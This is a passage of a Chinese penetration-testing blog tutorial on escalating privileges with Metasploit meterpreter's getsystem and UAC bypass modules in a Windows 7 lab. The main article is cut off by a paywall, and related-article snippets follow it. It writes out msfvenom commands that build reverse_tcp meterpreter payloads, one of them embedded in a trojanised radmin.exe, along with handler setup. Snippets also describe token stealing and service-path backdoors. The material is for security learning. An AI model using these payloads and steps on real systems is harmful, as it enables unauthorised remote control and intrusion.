meterpreter之getsystem命令提权详解

最新推荐文章于 2025-05-02 19:05:21 发布
原创 最新推荐文章于 2025-05-02 19:05:21 发布 · 9.6k 阅读 · 48
本文深入探讨了在Metasploit框架下使用getsystem命令进行权限提升的技巧,特别是在Windows Vista及更高版本的操作系统中,如何绕过UAC限制,实现从管理员组用户到SYSTEM权限的提升。文章详细介绍了实验环境搭建、提权失败原因分析、以及两种常见的绕过UAC的方法,包括exploit/windows/local/ask和exploit/windows/local/bypassuac模块的使用。
前言

meterpreter shell是msf上集成的一组功能强大的shell集合,当我们获取一个反弹的meterpreter shell时,可以轻松的通过各种命令对靶机进行控制。熟悉的meterpreter的同学都清楚,其中有一个getsystem命令,帮助文档说明是提权用的,没有更详细的说明,很多人会误解为这是meterpreter的一键提权工具,但每次输入这个命令,都会爆出各种“incorrect“和”denied“,本文将通过理论和实验说明此命令的适用环境及提权过程。

一、实验环境

靶机:win7 ip:10.10.10.166
攻击机:kali2020 ip:10.10.10.136
1、攻击机上使用msfvonem生成meterpreter的payload,并下载到靶机上

root@kali2020:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.136 LPORT=4444 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o rradmin.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 1319424 bytes
Saved as: rradmin.exe

2、攻击机开启监听,靶机运行payload,得到反弹shell,使用getsystem命令,提权失败。

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.10.136
lhost => 10.10.10.136
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.10.136:4444 
[*] Sending stage (180291 bytes) to 10.10.10.166
[*] Meterpreter session 1 opened
最低0.47元/天 解锁文章
升-Windows本地-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1783
进程迁移注入就是将获取到限低的进程注入至进程中限高的中,这样就实现了升,同时注入进程相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的限,数据库的增删改等,源码或配置文件泄漏,也可能是网站限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 6421
meterpreter使用攻略(持续更新中)
web安全渗透之钓鱼网站
kali_Ma的博客
11-12 4846
要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功:攻击成功后,想要从kali上传文件到win7中,后发现限不够的问题,则进行操作,后成功上传文件win7和kaliKali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。
supervisor nginx_Supervisor 的使用和进阶 (3)
weixin_39705018的博客
11-25 225
本文主要介绍 supervisor 对 fastcgi 进程的管理在php 中,php-fpm 有主进程来管理和维护子进程的数量。但是并不是所有的服务都有类似的主进程来做子进程的维护。在其他语言中,有很多比较有名的fastcgi 服务,例如py 的flup, c++ 实现的 FastCgi++等,如果这些服务在单机中启动多个进程(极有可能),那如何管理这些进程是个比较头疼的问题。supe...
getSystemservice()原理
zhll3377的专栏
02-21 3272
1. 说明   android的后台运行在很多service,它们在系统启动时被SystemServer开启,支持系统的正常工作,比如MountService监听是否有SD卡安装及移除,ClipboardService供剪切板功能,PackageManagerService供软件包的安装移除及查看等等,应用程序可以通过系统供的Manager接口来访问这些Service供的数据,以下将
深入内核:Meterpreter getsystem 原理全解析
vortex5的博客
02-23 1475
本文深入分析了Metasploit框架中getsystem命令的技术原理与应用场景。作为Windows渗透测试中获取SYSTEM限的核心工具,getsystem通过三种技术实现升:命名管道模拟(内存/管理员)、命名管道模拟(Dropper/管理员)和令牌复制(内存/管理员)。文章详细解析了每种技术的实现流程,包括创建命名管道、服务创建与连接、令牌模拟等关键步骤,并指出各技术的适用条件和限制。
meterpreter小结
MercyLin的博客
09-05 3265
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行 首先我们可以输入getuid来查看当前用户的限~ 可以看到我们貌似可能是管理员限,到底是不是还有待验证,我们的最终目的是将其升到system限. getsystem自动 输入getsystem来尝试,MSF会自动选择合适的方式来升当前限 这个就比较玄学,我还没成功过,可以看到g...
深入解析 Meterpreter 模块:从原理到实战
m0_57836225的博客
03-01 1279
在渗透测试领域,升是获取目标系统更高限、实现深度控制的关键环节。Meterpreter 作为强大的渗透测试工具,其模块为我们供了丰富多样的手段。本文将结合实际操作,深入剖析 Meterpreter 模块的使用方法与技巧,并以视频操作截取为示例,让大家更直观地理解整个过程。
getsystem命令,BypassUAC 自动,DLL 劫持应用配合 MSF-FlashFXP,不带引号服务路径配合 MSF-MacroExpert,不安全的服务限配合 MSF-New
最新发布
m0_74849202的博客
05-02 885
当一条服务对应的路径没有引号又有空格时,系统会把空格前的当作exe程序,把后面的当作参数,可以生成一个和前面名字一样的后门exe,当服务启动时,会成功上线,如果是系统服务,那获得的就是system限;在查看下已经被更改了,所以我们可以直接把1.exe更换为木马文件(msf.exe),并设置监听,靶机在启动test服务时就会重定向到1.exe,此时就可以了。此时此时在攻击机上启动监听,等待管理员运行这个程序,管理员一运行,就会触发dll文件,msf建立会话,这时候就可以用getsystem了。
| Windows系统
本散修的一些学习心得与笔记,道友请自便。
10-23 1887
篇:Windows系统常见姿势。
Meterpreter详解
渗透测试研究中心
08-16 546
0x01 Meterpreter自动 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为: windows/m...
windows的几种姿势
weixin_44300286的博客
09-07 4797
一、工具 1、msf 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
meterpreter后渗透阶段的基本操作(一)
zwish的信安之路
12-28 1689
这里只是一个笔记,可能没有那么全面和有条理,都是自己遇到的一些问题 1、shell里的中文乱码 获得一个meterpreter shell之后,使用shell命令,显示中文时会出现乱码 解决方法:在输入shell之后,再输入chcp 65001 2、相关的问题 getuid发现不是管理员限,使用getsystem命令(不使用参数默认使用全部方法)会报错,不成功、 (方式:1、g...
Meterpreter那些事
蚁景网安学院
06-20 1131
一引言Meterpreter我们经常会遇到,熟悉它掌握它对渗透测试至关重要。竟然无法逃避就得学会征服它,接下来我会带领征服Meterpreter。二准备实验环境1.Kali lin...
12.1、后渗透测试--
无痕的博客
12-13 954
meterpreter后渗透阶段
MSF操作
快吃小蛋糕吧的博客
10-30 1354
最近有个问题苦恼了我很久,“msf”是否可以控制多台服务器,怎么通过“msf”进行操作? 这里我直接开启了两台win7SP1X64的主机,通过运行后门的方式获得shell,这里生成shell的步骤略过。 获得服务器shell 首先我们在kali里面开启msf并调用exploit/multi/handler msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 e.
Windows升—BypassUAC、DLL劫持、引号路径、服务限等
2401_84973069的博客
05-13 1322
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
windows—msf、at、sc
negnegil的博客
09-10 921
msf 适用版本:windows 2k3、xp 获取到服务器的 meterpreter 后,有三个方向 getsystem 可以直接使用 getsystem 没成功 绕过UAC策略 MSF使用注册表 bypass uac 漏洞模块: exploit/windows/local/ask exploit/windows/local/bypassuac exploit/windows/local/bypassuac_injection 操作: use exploit/window
生成木马反弹和简单的Windows
BRMTSW的博客
03-01 963
生成木马反弹和简单的Windows
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值